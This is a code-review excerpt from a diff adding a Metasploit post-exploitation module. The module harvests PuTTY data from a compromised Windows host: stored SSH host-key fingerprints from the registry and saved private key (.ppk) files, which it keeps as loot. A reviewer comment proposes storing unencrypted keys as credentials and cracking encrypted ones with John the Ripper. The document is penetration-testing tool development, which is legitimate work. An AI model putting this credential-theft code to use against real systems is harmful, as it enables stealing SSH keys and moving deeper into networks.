modules/post/windows/gather/enum_putty_saved_sessions.rb

```diff
@@ -0,0 +1,211 @@
+    print_status("PuTTY saved sessions list saved to #{stored_path} in CSV format & available in notes (use 'notes -t putty.savedsession' to view).")
+  end
+
+  def get_stored_host_key_details(allkeys)
+    # This hash will store (as the key) host:port pairs. This is basically a quick way of
+    # getting a unique list of host:port pairs.
+    all_ssh_host_keys = {}
+
+    # This regex will split up lines such as rsa2@22:127.0.0.1 from the registry.
+    rx_split_hostporttype = /^(?<type>[-a-z0-9]+?)@(?<port>[0-9]+?):(?<host>.+)$/i
+
+    # Go through each of the stored keys found in the registry
+    allkeys.each do |key|
+      # Store the raw key and value in a hash to start off with
+      newkey = {
+        rawname: key,
+        rawsig: registry_getvaldata("#{PAGEANT_REGISTRY_KEY}\\SshHostKeys", key).to_s
+      }
+
+      # Take the key and split up host, port and fingerprint type. If it matches, store the information
+      # in the hash for later.
+      split_hostporttype = rx_split_hostporttype.match(key.to_s)
+      if split_hostporttype
+
+        # Extract the host, port and key type into the hash
+        newkey['host'] = split_hostporttype[:host]
+        newkey['port'] = split_hostporttype[:port]
+        newkey['type'] = split_hostporttype[:type]
+
+        # Form the key
+        host_port = "#{newkey['host']}:#{newkey['port']}"
+
+        # Add it to the consolidation hash. If the same IP has different key types, append to the array
+        all_ssh_host_keys[host_port] = [] if all_ssh_host_keys[host_port].nil?
+        all_ssh_host_keys[host_port] << newkey['type']
+      end
+      report_note(host: target_host, type: "putty.storedfingerprint", data: newkey, update: :unique_data)
+    end
+    all_ssh_host_keys
+  end
+
+  def display_stored_host_keys_report(info)
+    # Results table holds raw string data
+    results_table = Rex::Ui::Text::Table.new(
+      'Header'     => "Stored SSH host key fingerprints",
+      'Indent'     => 1,
+      'SortIndex'  => -1,
+      'Columns'    => ['SSH Endpoint', 'Key Type(s)']
+    )
+
+    info.each do |key, result|
+      row = []
+      row << key
+      row << result.join(', ')
+      results_table << row
+    end
+
+    print_line
+    print_line results_table.to_s
+    stored_path = store_loot('putty.storedfingerprints.csv', 'text/csv', session, results_table.to_csv, nil, "PuTTY Stored SSH Host Keys List")
+    print_status("PuTTY stored host keys list saved to #{stored_path} in CSV format & available in notes (use 'notes -t putty.storedfingerprint' to view).")
+  end
+
+  def grab_private_keys(sessions)
+    sessions.each do |ses|
+      filename = ses['PublicKeyFile'].to_s
+      next if filename.empty?
+
+      # Check whether the file exists.
+      if file?(filename)
+        ppk = read_file(filename)
+        if ppk # Attempt to read the contents of the file
+          stored_path = store_loot('putty.ppk.file', 'application/octet-stream', session, ppk)
```

Comment:
Even better if this detects if it is encrypted or plaintext key. If its  unencrypted it can be stored in the database. :D 

On a related note maybe metasploit-credential should be extended to handle encrypted keys. It could then have methods to allow them to be outputted in john-format (ala hashes) for cracking, and also have a 'passphrase' field which is used to decrypt it into an unencrypted key. Or something. :)